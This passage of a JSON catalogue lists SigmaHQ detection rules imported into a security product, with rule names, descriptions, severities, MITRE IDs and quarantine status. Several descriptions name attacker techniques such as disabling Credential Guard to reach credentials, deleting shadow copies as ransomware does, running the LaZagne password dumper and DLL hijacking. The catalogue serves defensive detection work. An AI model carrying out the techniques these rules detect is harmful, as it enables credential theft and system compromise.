"rules/linux/auditd/syscall/lnx_auditd_web_rce.yml" } }, { "id": "sigmahq-sigma-c0e0bdec-3e3d-47aa-9974-05539c999c89", "type": "detection", "name": "Registry Modification for OCI DLL Redirection", "description": "Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings.\nThreat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-for-oci-dll-redirection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c0e0bdec-3e3d-47aa-9974-05539c999c89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_potential_oci_dll_redirection.yml" } }, { "id": "sigmahq-sigma-c1182e02-49a3-481c-b3de-0fadc4091488", "type": "detection", "name": "Rare Subscription-level Operations In Azure", "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rare-subscription-level-operations-in-azure.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1182e02-49a3-481c-b3de-0fadc4091488", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_rare_operations.yml" } }, { "id": "sigmahq-sigma-c11aecef-9c37-45a6-9c07-bc0782f963fd", "type": "detection", "name": "RunMRU Registry Key Deletion", "description": "Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.\nIn the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.\nAdversaries may delete this key to cover their tracks after executing commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/runmru-registry-key-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c11aecef-9c37-45a6-9c07-bc0782f963fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_delete_runmru.yml" } }, { "id": "sigmahq-sigma-c1337eb8-921a-4b59-855b-4ba188ddcc42", "type": "detection", "name": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deletion-of-volume-shadow-copies-via-wmi-with-powershell-ps-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" } }, { "id": "sigmahq-sigma-c1344fa2-323b-4d2e-9176-84b4d4821c88", "type": "detection", "name": "Windows Defender Exclusions Added - PowerShell", "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exclusions-added-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" } }, { "id": "sigmahq-sigma-c15a46a0-07d4-4c87-b4b6-89207835a83b", "type": "detection", "name": "Add Potential Suspicious New Download Source To Winget", "description": "Detects usage of winget to add new potentially suspicious download sources", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-potential-suspicious-new-download-source-to-winget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml" } }, { "id": "sigmahq-sigma-c15e99a3-c474-48ab-b9a7-84549a7a9d16", "type": "detection", "name": "Remote Thread Creation Ttdinject.exe Proxy", "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-ttdinject-exe-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml" } }, { "id": "sigmahq-sigma-c172b7b5-f3a1-4af2-90b7-822c63df86cb", "type": "detection", "name": "Mask System Power Settings Via Systemctl", "description": "Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.\nAdversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.\nThis behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1653" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mask-system-power-settings-via-systemctl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c172b7b5-f3a1-4af2-90b7-822c63df86cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_systemctl_mask_power_settings.yml" } }, { "id": "sigmahq-sigma-c17d47b7-dcd6-4109-87eb-d1817bd4cbc9", "type": "detection", "name": "Windows Credential Guard Registry Tampering Via CommandLine", "description": "Detects attempts to add, modify, or delete Windows Credential Guard related registry keys or values via command line tools such as Reg.exe or 
PowerShell.\nCredential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\nAdversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.\nThe rule matches suspicious command lines that target DeviceGuard or LSA registry paths and manipulate keys like EnableVirtualizationBasedSecurity, RequirePlatformSecurityFeatures, or LsaCfgFlags.\nSuch activity may indicate an attempt to disable or tamper with Credential Guard, potentially exposing sensitive credentials for misuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-guard-registry-tampering-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c17d47b7-dcd6-4109-87eb-d1817bd4cbc9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering.yml" } }, { "id": "sigmahq-sigma-c187c075-bb3e-4c62-b4fa-beae0ffc211f", "type": "detection", "name": "A Rule Has Been Deleted From The Windows Firewall Exception List", "description": "Detects when a single rule or all of the rules have been deleted from the Windows Defender Firewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/a-rule-has-been-deleted-from-the-windows-firewall-exception-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" } }, { "id": "sigmahq-sigma-c191e2fa-f9d6-4ccf-82af-4f2aba08359f", "type": "detection", "name": "Logon from a Risky IP Address", "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/logon-from-a-risky-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml" } }, { "id": "sigmahq-sigma-c1d147ae-a951-48e5-8b41-dcd0170c7213", "type": "detection", "name": "App Granted Microsoft Permissions", "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or 
Azure AD", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/app-granted-microsoft-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1d147ae-a951-48e5-8b41-dcd0170c7213", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml" } }, { "id": "sigmahq-sigma-c1d867fe-8d95-4487-aab4-e53f2d339f90", "type": "detection", "name": "Renamed Sysinternals Sdelete Execution", "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-sysinternals-sdelete-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml" } }, { "id": "sigmahq-sigma-c1dda054-d638-4c16-afc8-53e007f3fbc5", "type": "detection", "name": "Automated 
Collection Command PowerShell", "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/automated-collection-command-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" } }, { "id": "sigmahq-sigma-c21c4eaa-ba2e-419a-92b2-8371703cbe21", "type": "detection", "name": "Setuid and Setgid", "description": "Detects suspicious change of file privileges with chown and chmod commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/setuid-and-setgid.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" } }, { "id": 
"sigmahq-sigma-c248c896-e412-4279-8c15-1c558067b6fa", "type": "detection", "name": "Enumerate All Information With Whoami.EXE", "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enumerate-all-information-with-whoami-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c248c896-e412-4279-8c15-1c558067b6fa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml" } }, { "id": "sigmahq-sigma-c2496b41-16a9-4016-a776-b23f8910dc58", "type": "detection", "name": "Certificate-Based Authentication Enabled", "description": "Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-based-authentication-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2496b41-16a9-4016-a776-b23f8910dc58", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/cloud/azure/audit_logs/azure_ad_certificate_based_authencation_enabled.yml" } }, { "id": "sigmahq-sigma-c260b6db-48ba-4b4a-a76f-2f67644e99d2", "type": "detection", "name": "HackTool - Covenant PowerShell Launcher", "description": "Detects suspicious command lines used in Covenant luanchers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-covenant-powershell-launcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_covenant.yml" } }, { "id": "sigmahq-sigma-c265cf08-3f99-46c1-8d59-328247057d57", "type": "detection", "name": "User Added to Local Administrator Group", "description": "Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/user-added-to-local-administrator-group.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c265cf08-3f99-46c1-8d59-328247057d57", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" } }, { "id": "sigmahq-sigma-c27515df-97a9-4162-8a60-dc0eeb51b775", "type": "detection", "name": "Suspicious Microsoft OneNote Child Process", "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-microsoft-onenote-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-c2993223-6da8-4b1a-88ee-668b8bf315e9", "type": "detection", "name": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-discovery-and-export-via-get-aduser-cmdlet-powershell.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" } }, { "id": "sigmahq-sigma-c2b86e67-b880-4eec-b045-50bc98ef4844", "type": "detection", "name": "HackTool - LaZagne Execution", "description": "Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.\nLaZagne has been leveraged multiple times by threat actors in order to dump credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-lazagne-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2b86e67-b880-4eec-b045-50bc98ef4844", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_lazagne.yml" } }, { "id": "sigmahq-sigma-c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "type": "detection", "name": "Potential Suspicious Activity Using SeCEdit", "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1547.001", "T1505.005", "T1556.002", "T1685", "T1574.007", "T1564.002", "T1546.008", "T1546.007", "T1547.014", "T1547.010", "T1547.002", "T1557", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-activity-using-secedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_secedit_execution.yml" } }, { "id": "sigmahq-sigma-c2e234de-03a3-41e1-b39a-1e56dc17ba67", "type": "detection", "name": "Remove Scheduled Cron Task/Job", "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-scheduled-cron-task-job.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" } }, { "id": "sigmahq-sigma-c30fb093-1109-4dc8-88a8-b30d11c95a5d", "type": "detection", "name": "Whoami.EXE Execution With Output Option", "description": "Detects the execution of \"whoami.exe\" with the \"/FO\" flag to choose CSV as output format or with redirection options to export the results to a file for later use.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/whoami-exe-execution-with-output-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_output.yml" } }, { "id": "sigmahq-sigma-c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "type": "detection", "name": "Import PowerShell Modules From Suspicious Directories - ProcCreation", "description": "Detects powershell scripts that import modules from suspicious directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/import-powershell-modules-from-suspicious-directories-proccreation.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml" } }, { "id": "sigmahq-sigma-c363385c-f75d-4753-a108-c1a8e28bdbda", "type": "detection", "name": "Potential Manage-bde.wsf Abuse To Proxy Execution", "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-manage-bde-wsf-abuse-to-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml" } }, { "id": "sigmahq-sigma-c39f0c81-7348-4965-ab27-2fde35a1b641", "type": "detection", "name": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", 
"category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dcom-internetexplorer-application-iertutil-dll-hijack-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c39f0c81-7348-4965-ab27-2fde35a1b641", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" } }, { "id": "sigmahq-sigma-c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "type": "detection", "name": "Rundll32 Execution With Uncommon DLL Extension", "description": "Detects the execution of rundll32 with a command line that doesn't contain a common extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-execution-with-uncommon-dll-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml" } }, { "id": "sigmahq-sigma-c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "type": "detection", "name": "Outlook Security Settings Updated - Registry", 
